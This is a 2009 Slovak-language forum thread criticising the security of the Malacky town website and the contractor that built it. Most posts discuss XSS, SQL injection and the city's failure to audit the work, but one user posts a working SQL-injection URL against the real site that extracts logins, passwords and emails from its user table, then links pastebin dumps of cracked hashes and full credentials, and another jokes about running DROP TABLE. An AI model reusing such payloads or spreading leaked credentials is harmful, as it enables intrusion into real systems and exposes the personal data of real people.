BLACKHOLE.sk - Hacknite si malacky.sk... - Comments

Re: Hacknite si malacky.sk...

pa3k — Sat, 11 Apr 2009 19:19:25 +0200

Ak by na úrade apoň niekto uvažoval hlavou a v rámci platnej legilatívy, určite by ich napadlo, že s novým webom im vzniká aj nový informačný systém a minimálne z pohľadu zákona o ochrane osobných údajov by mali bezpečnosť takéhoto systému riešiť.

Re: Hacknite si malacky.sk...

durino13 — Sat, 11 Apr 2009 19:02:27 +0200

Ide o to, ze na mestskom urade nikoho ani nenapadne, ze existuje daka moznost zneuzitia ich webu, takze pri preberani projektu to ani nik nekontroluje, resp. nikoho neziada o kontrolu. To co sa rata je design + ci to robi veci, ktore to robit ma. Otazky bezpecnosti sa riesia az potom, ked niekto dokresli na sajte primatorovi fuzy..

Re: Hacknite si malacky.sk...

pa3k — Sat, 11 Apr 2009 18:40:48 +0200

Áno nejaké SQL injection som si neskôr tiež všimol, je to fakt smutné. Takýchto "programátorov" bez akýchkoľvek skúseností je žiaľ dnes plno. Vidím to ale hlavne ako chybu mesta, pretože hotovú zákazku by si pred ostrým nasadením mali dať preveriť, keď už nikto z pracovníkov mesta nevie posúdiť kvalitu a bezpečnosť diela, tak to mali dať zhodnotiť externe.

Re: Hacknite si malacky.sk...

SeXy — Fri, 10 Apr 2009 23:31:23 +0200

Tak dropovat nic nebudem ale ked tak, tu su niake dumpy :

Cracknute hashe (SHA1 ) (ba 33% zo 100% ) :

http://pastebin.ca/1388358

Full dump vo formate login:pass:email

http://pastebin.ca/1388359

Have Fun :D

Re: Hacknite si malacky.sk...

pajon — Fri, 10 Apr 2009 23:12:21 +0200

a čo takto DROP TABLE ? :)

Re: Hacknite si malacky.sk...

SeXy — Fri, 10 Apr 2009 22:52:45 +0200

http://www.malacky.sk/index.php?page=uradtab_archiv&id=-1%20union%20all%20select%201,2,concat(login,0x3a,heslo,0x3a,email),4,5,6%20from%20mlc_user--

Re: Hacknite si malacky.sk...

tommyhot — Fri, 10 Apr 2009 02:45:00 +0200

PPS: (EDIT) tak už vidím, že tam sú aj horšie diery ako si napísal... súhlasím v tom, že to vyzerá na odfláknutú robotu.

Ta sajta je derava jak emental. SQL injection na kazdom rohu.. Sa cudujem, ze sa autor toho webu nehanbi nazvat programator. Ja by som ho nenazval ani wannabe..
----------
tommyhot@hackingmachine:~$ microsoft &> /dev/null

Re: Hacknite si malacky.sk...

pa3k — Fri, 10 Apr 2009 01:38:27 +0200

Aha, už chápem a aj ja držím malackému Billovy Gatesovy palce :-D

Re: Hacknite si malacky.sk...

snake — Fri, 10 Apr 2009 00:47:34 +0200

Žiadny problém? Cez nepermanentné XSS napriamo asi ťažko. Alebo je tam aj iná zraniteľnosť?

no ja tam vidím perzistentné XSS, môžem sa mýliť :) aj ja sa len učím :)

Free neznamená nič iné ako slobodný, s kvalitou kódu to môže mať spoločné pramálo.

s tým súhlasim, veď ja som nikde nepovedal že free = automaticky dobré a výborné, ja som len chcel poukázať na to, že napríklad Nuke, Joomla alebo drupal by to isto zvládol lepšie, a aj keď nie, tak isto za menší peniaz.

PS: reportol si im to? Reagovali? Ako dlho trvala oprava?

reportol samozrejme, oprava trvá už od augusta minulého roka dlho pradlho kedy im 17 ročný autor (od 11:15) dodal neúplnú aplikáciu, čo potvrdilo aj samo mesto, článkov na tému malacky.sk a oxide nájdeš na internete neúrekom, stačí počítať :)

PPS: (EDIT) tak už vidím, že tam sú aj horšie diery ako si napísal... súhlasím v tom, že to vyzerá na odfláknutú robotu.

;)

Re: Hacknite si malacky.sk...

pa3k — Fri, 10 Apr 2009 00:07:34 +0200

Kradnúť maily? Cookies? Heslá? opäť žiadny problém.

Žiadny problém? Cez nepermanentné XSS napriamo asi ťažko. Alebo je tam aj iná zraniteľnosť?

Dôvod prečo postujem tento článok je ten, že ma zaujalo, ako mesto Malacky dá peniaze (dosť veľké - pravda?) za projekt

No neviem, mne to nepríde ako veľký peniaz a už vôbec nie za projekt podobného pozsahu.

bez akéhokoľvek zabezpečenia,

Bez akéhokoľvek zabezpečenia? Napíš o tom niečo viac ak sa dá, lebo z toho čo si napísal to môže byť kľudne jedno zabudnuté htmlspecialchars a neošetrené magic_quotes.

namiesto toho aby použila free CMS riešenia, ktoré sú (väčšinou) bez takýchto veľkých a "detských" chýb.

:) Ehm, to by som už vôbec negeneralizoval. Free neznamená nič iné ako slobodný, s kvalitou kódu to môže mať spoločné pramálo. Napríklad taký Free a OpenSource ZENcart - osobne moc nepoznám, názory adminov a hosterov v diskusii sú ale pekne pikantné a hovoria za všetko. Verím tomu, mám podobné skúsenosti s inými OpenSource projektami.

PS: reportol si im to? Reagovali? Ako dlho trvala oprava?
PPS: (EDIT) tak už vidím, že tam sú aj horšie diery ako si napísal... súhlasím v tom, že to vyzerá na odfláknutú robotu.

Hacknite si malacky.sk...

snake — Thu, 09 Apr 2009 19:52:08 +0200

Dnes si tak brúzdam sajtom Malaciek (malacky.sk), až narazím na spoločnosť, ktorá mala túto stránku na starosti - oxide.sk . Niekde som názov tejto firmy už počul, nespomenul som si avšak kde, tak som skúsil Google a dostávam sa na stránku SME.sk, kde sa dozvedám, že portál malacky stál 88-tisíc slovenských korún (2921€).